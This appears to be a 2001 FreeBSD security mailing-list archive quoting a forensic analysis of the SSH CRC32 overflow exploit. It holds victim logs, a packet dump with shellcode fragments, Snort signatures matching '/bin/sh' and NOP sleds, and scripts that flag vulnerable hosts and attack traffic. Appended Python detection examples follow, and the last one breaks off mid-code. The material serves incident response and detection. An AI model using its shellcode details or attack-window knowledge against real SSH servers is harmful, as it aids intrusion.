>Nov  1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390
>Nov  1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391
>Nov  1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392
>Nov  1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393
>Nov  1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.
>Nov  1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
>Nov  1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
>Nov  1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
>Nov  1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
>Nov  1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
>Nov  1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
>Nov  1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
>Nov  1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
>Nov  1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
>Nov  1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>One final point. Note the last syslog entry. The successful exploit
>causes an authentication attempt to pause while the shell code back door
>becomes active. You can connect to the shell and do whatever you
>want. Only problem is, the original SSH daemon (at least with SSH.com
>1.2.31) will time out when the authentication doesn't complete, and the
>shell will be terminated. This gives a window of ten minutes (at
>least with SSH.com 1.2.31) before the listening shell's parent dies
>and another exploit attempt must be started. (That is plenty of time
>to fully root the box eight ways from Sunday, unfortunately.)
>
>
>
>Network traffic
>===============
>
>Tcpdump was used to capture the two "attacks" shown above. (The tcpdump
>file "sshdx.dump", rather than the exploit itself, is available [11]
>for those wishing to tune their IDSs to detect signatures of this
>particular exploit. Use something like "tcpreplay" [12] if your IDS
>does not support tcpdump files, then tell your coders to write tcpdump
>import functions like Snort. ;)
>
>[NOTE: The tcpdump file was obtained using Red Hat's screwed up
>libpcap, which includes the device name in the dump records. This
>means that all utilities, like "ngrep", must be linked against
>Red Hat's stock libpcap in order to read this file. I REALLY wish
>that Red Hat had worked with the folks who maintain libpcap and
>convinced them to support either dump format, or switch to adding
>the device name in the standard libpcap, instead of going their
>own way in what seems to be typical Linux fashion. This *really*
>makes it hard to share tcpdump files between operating systems.]
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
># tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>It can readily be seen that multiple connections are made to the SSH
>daemon, and using "ngrep" [5], you can even spot the final connection
>and brute force attack which interjects the shell code:
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> . . .
>
>T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
>  SSH-1.5-1.2.31.
>
>T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
>  SSH-1.5-OpenSSH_2.2.0p1.
>
>T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
>  ............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
>  ..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j
>  W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K .@7.wB
>  By......1.i..%".....G*g.G.t(......M........[.......J......<.
>
>T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
>  ............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
>  T.....|c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
>  ....Q/.......8..
>
>T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
>  .........4..
>
>T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
>  ..W...2.......2.......2.......2.......2.......2.......2.......2.......
>  2.......2.......2.......2.......2.......2.......2.......2.......2 ....
>  ..2!......2$......2%......2(......2)......2,......2-......20......21..
>  ....24......25......28......29......2<......2=......2@......2A......2D
>  ......2E......2H......2I......2L......2M......2P......2Q......2T......
>  2U......2X......2Y......2\......2]......2`......2a......2d......2e....
>  ..2h......2i......2l......2m......2p......2q......2t......2u......2x..
>  ....2y......2|......2}......2.......2.......2.......2.......2.......2.
>  ......2.......2.......2.......2.......2.......2.......2.......2.......
>  2.......2.......2.......2.......2.......2.......2.......2.......2.....
>  ..2.......2.......2.......2.......2.......2.......2.......2.......2...
>  ....2.......2.......2.......2.......2.......2.......2.......2.......2.
>  ......2.......2.......2.......2.......2.......2.......2.......2.......
>  2.......2.......2.......2.......2.......2.......2.......2.......2.....
>  ..2.......2.......2.......2.......2.......2.......3.......3.......3...
>  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
>  ......3.......3.......3.......3.......3 ......3!......3$......3%......
>  3(......3)......3,......3-......30......31......34......35......38....
>  ..39......3<......3=......3@......3A......3D......3E......3H......3I..
>  ....3L......3M......3P......3Q......3T......3U......3X......3Y......3\
>  ......3]......3`......3a......3d........1...p}.@
>
>T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
>  ......3i......3l......3m......3p......3q......3t......3u......3x......
>  3y......3|......3}......3.......3.......3.......3.......3.......3.....
>  ..3.......3.......3.......3.......3.......3.......3.......3.......3...
>  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
>  ......3.......3.......3.......3.......3.......3.......3.......3.......
>  3.......3.......3.......3.......3.......3.......3.......3.......3.....
>  ..3.......3.......3.......3.......3.......3.......3.......3.......3...
>  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
>  ......3.......3.......3.......3.......3.......4.......4.......4.......
>  4.......4.......4.......4.......4.......4.......4.......4.......4.....
>  ..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
>  ....4)......4,......4-......40......41......44......45......48......49
>  ......4<......4=......4@......4A......4D......4E......4H......4I......
>  4L......4M......4P......4Q......4T......4U......4X......4Y......4\....
>  ..4]......4`......4a......4d......4e......4h......4i......4l......4m..
>  ....4p......4q......4t......4u......4x......4y......4|......4}......4.
>  ......4.......4.......4.......4.......4.......4.......4.......4.......
>  4.......4.......4.......4.......4.......4.......4.......4.......4.....
>  ..4.......4.......4.......4.......4.......4.......4.......4.......4...
>  ....4.......4.......4.......4.......4.......4.......4.......4.......4.
>  ......4.......4.......4.......4.........1...p}.@
>
> . . .
>
>T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  .....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
>  .E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
>  ./bin/sh.h0h0h0, 7350, zip/TESO!......................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ......................................................................
>  ........................................1...p}.@
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>You can match (for this exploit binary) on the string "h0h0h0, 7350,
>zip/TESO!" [7] in the packet payload, as well as for the "/bin/sh"
>and NOP sled. (Of course these, and other strings, may change or
>disappear in derivatives of the original source.)
>
>The following signatures were developed by Marty Roesch and Brian
>Caswell, for use with Snort v1.8 or higher [6].
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
>	(msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
>	flags:A+; content:"/bin/sh"; \
>	reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
>	classtype:shellcode-detect;)
>
>alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
>	(msg:"EXPLOIT ssh CRC32 overflow filler"; \
>	flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; \
>	reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
>	classtype:shellcode-detect;)
>
>alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
>	(msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
>	flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; \
>	reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
>	classtype:shellcode-detect;)
>
>alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
>	(msg:"EXPLOIT ssh CRC32 overflow"; \
>	flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; \
>	content:"|FF FF FF FF 00 00|"; offset:8; depth:14; \
>	reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
>	classtype:shellcode-detect;)
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>Identification of potentially vulnerable or exploited hosts
>===========================================================
>
>Two scanners exist to identify ssh servers and their versions: Jeremy
>Mates' scan_ssh.pl[8] and Niels Provos' ScanSSH scanner[9]. A script
>to take the results of a scan with scan_ssh.pl and produce a break
>report on SSH server version and potential vulnerability can be found
>in Appendix A. You may need to update the script based on
>vulnerability information provided by the authors of various SSH
>servers to get accurate results.
>
>Russell Fulton also has published a script for processing Argus[10]
>logs, included below in Appendix C.
>
>
>Final Note
>==========
>
>Team TESO issued a public statement about this exploit on 11/8/2001.
>You can find it here:
>
>  http://www.team-teso.org/sshd_statement.php
>
>
>Credits
>=======
>
>Thanks to Cindy Jenkins of UW MCIS for recovery of the artifacts
>analyzed here, Marty Roesch and Brian Caswell for Snort signatures,
>Mike Hornung for vulnerability assessment scan data and patches to
>Jeremy Mates' scanner, Russell Fulton, Peter Van Epp, Simple Nomad,
>Rik Farrow, Dug Song, other unnamed individuals, and all the folks at
>SecurityFocus.com for their input.
>
>
>Dave Dittrich
>http://staff.washington.edu/dittrich/
>
>
>The most recent version of this file can be found at:
>
>  http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
>
>
>References
>==========
>
>[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
>    http://www.all.net/ForensiX/plac.html
>
>[2] Netcat, by der Hobbit
>    http://www.l0pht.com/~weld/netcat/
>
>[3] Reverse Engineer's Query Tool
>    http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz
>
>[4] LiSt Open Files (lsof)
>    http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz
>
>[5] ngrep, by Jordan Ritter
>    http://www.packetfactory.net/projects/ngrep/
>
>[6] Snort, by Marty Roesch and a cast of thousands
>    http://www.snort.org/
>
>[7] 7350.org / 7350
>    http://www.7350.org/
>    http://www.team-teso.org/about.php (see the bottom)
>
>[8] ssh_scan.pl, by Jeremy Mates
>    http://sial.org/code/perl/scripts/ssh_scan.pl.html
>
>[9] ScanSSH scanner by Niels Provos
>    http://www.monkey.org/~provos/scanssh/
>
>[10] Argus - A generic IP network transaction auditing tool
>    http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1
>
>[11] tcpdump of attack traffic (using Red Hat's screwed up version of libpcap)
>    http://staff.washington.edu/dittrich/misc/sshdx.dump
>
>[12] tcpreplay
>    http://packages.debian.org/testing/net/tcpreplay.html
>
>
>Appendix A
>==========
>
>Script for producing a one level break report based on known
>vulnerability status of several SSH servers and versions.
>(NOTE: You may need to modify this script for it to be accurate,
>and to understand its limitations - You must read it before using
>it.)
>
>
> =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>#!/usr/bin/perl
>#
># ssh-report
>#
># Dave Dittrich
># Thu Nov 8 21:39:20 PST 2001
>#
># Process output of scans for SSH servers, with version identifying
># information, into two level break report format by SSH version.
>#
># This script operates on a list of scan results that look
># like this:
>#
># % cat scanresults
># 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
># 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
># 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
># 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
># 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
># 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
># 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
># 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
># 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
>#
># The resulting report (without the "-a" flag) will look like this:
>#
># % ssh-report < scanresults
>#
># SSH-1.5-1.2.31 (affected)
>#    beavertail.dept.foo.edu(10.0.0.1)
>#    lumpysoup.dept.foo.edu(10.0.0.2)
>#    junebug.dept.foo.edu(10.0.0.4)
>#
>#
># SSH-1.99-OpenSSH_2.1.1 (affected)
>#    hobbes.dept.foo.edu(10.0.0.11)
>#
># By default, this script will only report on those systems that
># are running potentially vulnerable SSH servers. Use the "-a"
># option to report on all servers. Use "grep -v" to filter out
># hosts *before* you run them through this reporting script.
>#
># SSH servers are considered "affected" if they are known, by being
># listed in one or more of the following references, to have the crc32
># compensation attack detector vulnerability:
>#
>#   http://www.kb.cert.org/vuls/id/945216
>#   http://www.securityfocus.com/bid/2347/
>#   http://xforce.iss.net/alerts/advise100.php
>#   http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
>#
># You also may need to adjust the logic below to lump systems
># into the "Unknown" category correctly (e.g., if your server
># has a custom version string, access control, etc.)
>#
># The list below of servers and potential vulnerability was derived by
># summarizing existing versions on a set of production networks and
># using the advisories and reference material listed above. You
># should update this list as new information is obtained, or if new
># versions of the SSH server are found on your network.
>
>%affected = (
>'Unknown', 'unknown',
>'SSH-1.4-1.2.14', 'not affected',
>'SSH-1.4-1.2.15', 'not affected',
>'SSH-1.4-1.2.16', 'not affected',
>'SSH-1.5-1.2.17', 'not affected',
>'SSH-1.5-1.2.18', 'not affected',
>'SSH-1.5-1.2.19', 'not affected',
>'SSH-1.5-1.2.20', 'not affected',
>'SSH-1.5-1.2.21', 'not affected',
>'SSH-1.5-1.2.22', 'not affected',
>'SSH-1.5-1.2.23', 'not affected',
>'SSH-1.5-1.2.24', 'affected',
>'SSH-1.5-1.2.25', 'affected',
>'SSH-1.5-1.2.26', 'affected',
>'SSH-1.5-1.2.27', 'affected',
>'SSH-1.5-1.2.28', 'affected',
>'SSH-1.5-1.2.29', 'affected',
>'SSH-1.5-1.2.30', 'affected',
>'SSH-1.5-1.2.31', 'affected',
>'SSH-1.5-1.2.31a', 'not affected',
>'SSH-1.5-1.2.32', 'not affected',
>'SSH-1.5-1.3.7', 'not affected',
>'SSH-1.5-Cisco-1.25', 'unknown',
>'SSH-1.5-OSU_1.5alpha1', 'unknown',
>'SSH-1.5-OpenSSH-1.2', 'affected',
>'SSH-1.5-OpenSSH-1.2.1', 'affected',
>'SSH-1.5-OpenSSH-1.2.2', 'affected',
>'SSH-1.5-OpenSSH-1.2.3', 'affected',
>'SSH-1.5-OpenSSH_2.5.1', 'not affected',
>'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',
>'SSH-1.5-OpenSSH_2.9p1', 'not affected',
>'SSH-1.5-OpenSSH_2.9p2', 'not affected',
>'SSH-1.5-RemotelyAnywhere', 'not affected',
>'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',
>'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',
>'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',
>'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',
>'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',
>'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',
>'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',
>'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',
>'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',
>'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',
>'SSH-1.99-OpenSSH-2.1', 'affected',
>'SSH-1.99-OpenSSH_2.1.1', 'affected',
>'SSH-1.99-OpenSSH_2.2.0', 'affected',
>'SSH-1.99-OpenSSH_2.2.0p1', 'affected',
>'SSH-1.99-OpenSSH_2.3.0', 'not affected',
>'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',
>'SSH-1.99-OpenSSH_2.5.1', 'not affected',
>'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',
>'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',
>'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',
>'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',
>'SSH-1.99-OpenSSH_2.9', 'not affected',
>'SSH-1.99-OpenSSH_2.9p1', 'not affected',
>'SSH-1.99-OpenSSH_2.9p2', 'not affected',
>'SSH-1.99-OpenSSH_3.0p1', 'not affected',
>'SSH-2.0-1.1.1', 'unknown',
>'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',
>'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',
>'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',
>'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',
>'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',
>'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',
>'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',
>'SSH-2.0-OpenSSH_2.9p2', 'not affected',
>);
>
># Make SURE you read the code first.
>&IKnowWhatImDoing();
>
>$all++, shift(@ARGV) if $ARGV[0] eq "-a";
>
>while (<>) {
>	chop;
>	s/\s+/ /g;
>	($ip, $host, $version) = split(' ', $_);
>
>	# Adjust this to identify other strings reported
>	# by servers that have access restrictions, etc.
>	# in place and do not show a specific version number.
>	# They all fall under the category "Unknown" in this case.
>	$version = "Unknown"
>		if ($version eq "Couldn't" ||
>		    $version eq "Unknown" ||
>		    $version eq "You" ||
>		    $version eq "timeout");
>
>	$server{"$version:$ip"} = $host;
>}
>
>foreach $i (sort keys %server) {
>	($version,$ip) = split(":", $i);
>	next if ($affected{$version} eq "not affected" && ! $all);
>	printf("\n\n%s (%s)\n", $version, $affected{$version})
>		if ($curver ne $version);
>	$curver = $version;
>	print "   " . $server{$i} . "($ip)\n";
>}
>
>exit(0);
>
>sub IKnowWhatImDoing {
>	local $IKnowWhatImDoing = 0;
>
>	# Uncomment the following line to make this script work.
>	# $IKnowWhatImDoing++;
>	die "I told you to read the code first, didn't I?\n"
>		unless $IKnowWhatImDoing;
>	return;
>}
> =-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>
>
>Appendix C
>==========
>
>Russell Fulton published the following to the unisog@sans.org
>email list, based on information provided by Peter Van Epp.
>
>
>
>From r.fulton@auckland.ac.nz Thu Nov 8 12:38:15 2001
>Date: Mon, 5 Nov 2001 11:31:05 +1300 (NZDT)
>Subject: [unisog] Tool to find ssh attacks in argus logs
>From: Russell Fulton
>To: unisog@sans.org, argus-info@lists.andrew.cmu.edu
>
>Greetings All,
>	Here is a quick perl hack to scan archived argus[1] logs
>for evidence of ssh attacks. The current attack that we have seen
>iterates an offset for the shell code and this script picks up the
>repeated attempts. The script is quite specific to this attack and
>looks for ssh sessions within a quite narrow size range.
>
>It has been tested by Peter Van Epp (thanks Peter!) on real data and
>picked up all known attacks that they had seen and outgoing attacks from
>machines on the network that had already been compromised. Peter also
>modified the script to work with argus 1.8.x (see comments).
>
>This is a first cut at this problem. If I get time I will modify this
>(using stuff from my watcher scan detector script) to give real time
>notification on attacks.
>
>[1]: Argus IP audit tool http://www.qosient.com
>
>Russell Fulton, Computer and Network Security Officer
>The University of Auckland, New Zealand
>
>#!/usr/bin/perl
>
>my %ipn;
>
>$ENV{TZ} = 'UTC';
>
>
># Assumes version 2.0 ra -- remove A switch if running with 1.8.x data
>
>if (! open(RA, "bin/ra -Ancr ".join(' ', @ARGV) .
>	   " - tcp and dst port 22 |") ) {
>	die "failed to open connection to server";
>}
>
># Read one flow record per line from the ra pipe opened above.
>while (<RA>) {
>	chomp;
>	my ( $timestmp, $proto, $src, $srcp, $sym, $dst,
>	     $dstp, $topkt, $fpkt, $tobytes, $fbytes, $status) =
>	unpack "A19x3A4a15xA6A3x2A16xA5xA8xA9xA12xA12a10", $_;
># From Peter Van Epp:
># If you are a luddite like me and still running 1.8.1 comment out the 3 lines
># above and uncomment the 5 lines below
>
>#	my ( $timestmp, $flag, $proto, $src, $srcp, $sym, $dst,
>#	     $dstp, $topkt, $fpkt, $tobytes, $fbytes, $status) =
>#	unpack "A18xA3xA4xA15xA6A3xA15xA5xA6xA6x2A9xA9A3", $_;
>#	$src =~ s/ //g;
>#	$dst =~ s/ //g;
>
># Only sessions in the byte-count band seen for this attack are kept.
>next unless ( $tobytes > 90000 and $tobytes < 110000 and
>		  $fbytes > 300 and $fbytes < 400);
>
>	if( ! exists $ipn{$src} ) {
>		$ipn {$src} = {};
>		$ipn {$src}->{COUNT} = 1;
>		$ipn {$src}->{TOTAL} = 0;
>		$ipn{$src}->{TIME} = $timestmp;
>#print "$ipn{$src}->{TIME}\n";
>		$ipn {$src}->{$dst} = 1;
>	};
>	if( ! exists $ipn{$src}->{$dst} ) {
>		$ipn {$src}->{COUNT}++;
>		$ipn {$src}->{$dst} = 1;
>	} else {
>		$ipn {$src}->{$dst}++;
>	}
>	$ipn {$src}->{TOTAL}++;
>	$ipn{$src}->{LTIME} = $timestmp;
>
>}
>print scalar keys %ipn, "\n";
>
># Report sources with the most matching sessions first.
>foreach my $ip (sort {$ipn{$b}->{TOTAL} <=> $ipn{$a}->{TOTAL}} keys
>%ipn ) {
>#	my $dn = gethostbyaddr(pack("C4",split(/\./,$ip)),2) || '';
>#	last if $ipn{$ip}->{TOTAL} == 1;
>	print "$ip $ipn{$ip}->{TIME} -- $ipn{$ip}->{LTIME} # number of
>targets $ipn{$ip}->{COUNT} total sessions $ipn{$ip}->{TOTAL}\n" ;
>}
>--
>Dave Dittrich                   Computing & Communications
>dittrich@cac.washington.edu     University Computing Services
>http://staff.washington.edu/dittrich   University of Washington
>
>PGP key      http://staff.washington.edu/dittrich/pgpkey.txt
>Fingerprint  FE 97 0C 57 08 43 F3 EB 49 A1 0C D0 8E 0C D0 BE C8 38 CC B5
>
>
>----------------------------------------------------------------------------
>This list is provided by the SecurityFocus ARIS analyzer service.
>For more information on this free incident handling, management
>and tracking system please see: http://aris.securityfocus.com

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Nov 18 12:13:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from thedarkside.nl (cc31301-a.assen1.dr.nl.home.com [213.51.66.128]) by hub.freebsd.org (Postfix) with ESMTP id C23DE37B405 for ; Sun, 18 Nov 2001 12:13:38 -0800 (PST) Received: (from root@localhost) by thedarkside.nl (8.11.6/8.11.6) id fAIKDZJ25858; Sun, 18 Nov 2001 21:13:35 +0100 (CET) (envelope-from g.p.de.boer@st.hanze.nl) Received: from kilmarnock.st.hanze.nl (kilmarnock [10.0.0.2]) by thedarkside.nl (8.11.6/8.11.6av) with ESMTP id fAIKDUB25850; Sun, 18 Nov 2001 21:13:30 +0100 (CET) (envelope-from g.p.de.boer@st.hanze.nl) Message-Id: <5.1.0.14.0.20011118211207.01fd4df8@thedarkside.nl> X-Sender: 125105@pop5.st.hanze.nl X-Mailer: QUALCOMM Windows Eudora
Version 5.1 Date: Sun, 18 Nov 2001 21:13:28 +0100 To: Brett Glass , security@freebsd.org From: "G.P. de Boer" Subject: Re: Patching 4.4-RELEASE against SSHv1 exploit In-Reply-To: <4.3.2.7.2.20011118124921.041ea050@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

At 20:56 18-11-2001, Brett Glass wrote:
>In a recent message to Bugtraq (quoted below), Dave Dittrich notes that an
>SSH exploit has been specifically tuned to attack machines running FreeBSD
>4.x and certain versions of SSH. The hole apparently dates back to the
>liberally licensed versions of SSH, and so is present in both OpenSSH and
>SSH, Inc.'s SSH. Is 4.4-RELEASE vulnerable in the default install if sshd
>is enabled? If so, is there a patch?

4.4-RELEASE base has OpenSSH-2.3.0, which isn't vulnerable to this attack.

GP.
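The syslog excerpt in the Dittrich analysis quoted earlier in this thread shows three things an administrator can look for in sshd's own log: a burst of connections from one source, a child that dies with "Corrupted check bytes on input", and a final child that sits in authentication until the daemon's timeout (ten minutes in that case) fires. The script below, an added example that is not part of the analysis or of any list post, reproduces that triage over a log file. It assumes the syslog line format shown in the quote and a year supplied by the caller (syslog lines carry none); the 10.10.10.10 lines are copied from the quoted log and the 192.0.2.7 line is a constructed, benign connection for contrast.

```python
"""Flag the sshd syslog pattern described in the crc32 analysis."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The 10.10.10.10 lines are reproduced from the quoted analysis; the
# 192.0.2.7 line is constructed and stands for an ordinary login.
SAMPLE_LOG = """\
Nov 1 18:40:02 victim sshd[9590]: log: Connection from 192.0.2.7 port 1022
Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394
Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395
Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396
Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397
Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398
Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[(\d+)\]: (.*)$")
CONN_RE = re.compile(r"Connection from (\S+) port \d+")


def parse_line(line, year=2001):
    """Return (timestamp, pid, message) for an sshd line, else None.
    syslog lines carry no year, so the caller supplies one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, int(m.group(2)), m.group(3)


def analyze(log_text, burst_count=5, burst_window=timedelta(seconds=10)):
    """Group sshd events by source address and score each source.

    A source is 'suspicious' when it opened burst_count connections inside
    burst_window and one of its children either aborted with the crc32
    'Corrupted check bytes' error or timed out before authenticating."""
    conns = defaultdict(list)   # src -> [(connect ts, pid), ...]
    pid_conn = {}               # pid -> (src, connect ts)
    corrupted = set()           # sources with a 'Corrupted check bytes' child
    timeouts = {}               # src -> seconds from connect to auth timeout
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ts, pid, msg = rec
        m = CONN_RE.search(msg)
        if m:
            conns[m.group(1)].append((ts, pid))
            pid_conn[pid] = (m.group(1), ts)
        elif pid in pid_conn and "Corrupted check bytes" in msg:
            corrupted.add(pid_conn[pid][0])
        elif pid in pid_conn and "Timeout before authentication" in msg:
            src, started = pid_conn[pid]
            timeouts[src] = int((ts - started).total_seconds())

    report = {}
    for src, lst in conns.items():
        lst.sort()
        # Sliding window: any burst_count consecutive connects within burst_window.
        burst = any(lst[i + burst_count - 1][0] - lst[i][0] <= burst_window
                    for i in range(len(lst) - burst_count + 1))
        report[src] = {
            "connections": len(lst),
            "burst": burst,
            "corrupted_check_bytes": src in corrupted,
            "auth_timeout_seconds": timeouts.get(src),
            "suspicious": burst and (src in corrupted or src in timeouts),
        }
    return report


if __name__ == "__main__":
    for src, info in analyze(SAMPLE_LOG).items():
        print(src, info)
```

Run against the sample, the 10.10.10.10 source is reported with eight connections, a burst, the corrupted-check-bytes abort and a 600-second gap between the last connect and its authentication timeout, which is exactly the ten-minute window the analysis describes; the constructed 192.0.2.7 login is not flagged. The thresholds are parameters because the burst size and the daemon's timeout differ between SSH implementations.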
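The four Snort rules quoted earlier in the thread reduce to content matches, two of them anchored with offset and depth. For anyone who wants to test a captured payload against those signatures without a Snort installation, or to see why the "filler" and "NOOP" rules alert on their own, the following added example (written for this page, not taken from the analysis or from Snort) evaluates the same checks in Python. It treats depth as counted from the offset, as Snort applies it, and ignores the TCP flag test (flags:A+), since only the payload is examined; the three sample payloads are constructed here and are not taken from the pcap.

```python
"""Evaluate the content/offset/depth checks from the quoted Snort rules."""

# (pattern, offset, depth) tuples transcribed from the four rules.
# depth None means "search to the end of the payload".
RULES = {
    "EXPLOIT ssh CRC32 overflow /bin/sh": [(b"/bin/sh", 0, None)],
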